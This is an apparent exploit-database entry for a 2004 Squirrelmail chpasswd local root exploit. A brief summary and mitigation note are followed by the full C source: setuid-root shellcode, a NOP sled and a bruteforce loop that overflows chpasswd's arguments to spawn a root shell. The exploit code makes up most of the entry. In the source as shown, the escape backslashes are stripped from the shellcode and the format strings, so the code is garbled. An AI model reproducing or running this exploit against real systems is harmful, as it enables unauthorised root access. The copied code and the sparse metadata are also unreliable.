Squirrelmail chpasswd Local Root Bruteforce Exploit

vendor:

Squirrelmail

by:

Bytes <Bytes[at]ph4nt0m.net>

CVSS

CRITICAL

Local Root Exploit

119

CWE

Product Name: Squirrelmail

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2004

Squirrelmail chpasswd Local Root Bruteforce Exploit

This exploit is a local root bruteforce exploit for Squirrelmail chpasswd. It allows an attacker to gain root privileges on a system by exploiting a vulnerability in the chpasswd program. The exploit uses a buffer overflow to overwrite the return address on the stack and execute arbitrary code with root privileges. The exploit requires the attacker to have access to an account belonging to the webmaster, www, or other webserver groups.

Mitigation:

The vulnerability can be mitigated by patching the chpasswd program to prevent buffer overflows. It is also recommended to restrict access to accounts belonging to the webmaster, www, or other webserver groups.

Source

Exploit-DB raw data:

/* 

** PST_chpasswd_exp-v_b.c: 
** 
** Squirrelmail chpasswd local root bruteforce exploit 
** Author: 
** Bytes<Bytes[at]ph4nt0m.net> || <Bytes[at]ph4nt0m.org> 
** www ph4nt0m net 
** Notice: 
** v_b: Local bruteforce version 
** v_R: remote bruteforce version 
** 
** 
** Greatze: #ph4nt0m,#music@0x557 
** All PST member,Grip2,Airsupply,Jambalaya,Ann,Paul,Happy... 
** Thax: My GF(Luz),Oyxin,Winewind,Envymask,Eong,luoluo,GoGo(f0r ever)... 
** 
** 
** -=-=-=-=-=-=-=-=-=-= !!![+PH4NT0M TEAM PRIVATE EXPLOIT+]!!! =-=-=-=-=-=-=-=-=-=- 
** 
** Date: 2004-04 # DO NOT DISTRIBUTE # 
** 
** You Must get account belong to Webmaster ,www or other webserver groups. 
** 
*/ 

#include <stdio.h> 
#include <unistd.h> 
#include <stdlib.h> 
#include <sys/wait.h> 

#define NOP 0x90 
#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */ 
#define LOOP 2000 /* loop of bruteforce */ 

/* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */ 

char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68" 
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80"; 

unsigned long get_esp() { 

__asm__ ("movl %esp,%eax"); 

} 

void *M_malloc(size_t size){ 

register void *value; 

value = malloc(size); 

if(value == NULL){ 

printf("ERROR:virtual memory exhausted...n"); 

exit(-1); 

} 

return value; 

} 

int main(void){ 

unsigned long ret_addr; 

int i,j=0,offset=2,status; 

char *buf1,*buf2; 

pid_t pid; 

ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode); 

printf("t-------------------------------------------------------n"); 
printf("t Squirrelmail chpasswd local root bruteforce exploit n"); 
printf("t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n"); 
printf("t http://www.ph4nt0m.net n"); 
printf("t#######################################################n"); 


sleep(1); 

printf("[+] Bruteforce......nn"); 

sleep(2); 

buf1 = (char *)M_malloc(150); 

buf2 = (char *)M_malloc(600); 

while(j <= LOOP){ 

if((pid = fork()) == 0){ 

memset(buf2,0x90,sizeof(buf2) - strlen(shellcode) - 8); 

memcpy(buf2 + sizeof(buf2) - strlen(shellcode) - 8,shellcode,sizeof(shellcode)); 

for(i=0; i < 150; i+=4){ 

*((unsigned long *)(buf1+i)) = ret_addr; 

} 

printf("buf1 = %sn",buf1); 

execl(Fuckpr0,"chpasswd",buf1,buf2,0); 

} 

wait(&status); 

printf("[-] Signal: #%in", status); 

if(WIFEXITED(status) != 0 ) { 

printf("[=] Step.%i: 0x%xn[~] Exiting...n",(j/2),ret_addr); 

exit(1); 

}else{ 

ret_addr += offset; 

j += offset; 

printf("[=] Offset:%d Use ret:0x%xn",j, ret_addr); 

} 

} 

free(buf1); 

free(buf2); 

return 1; 

} 

// milw0rm.com [2004-08-25]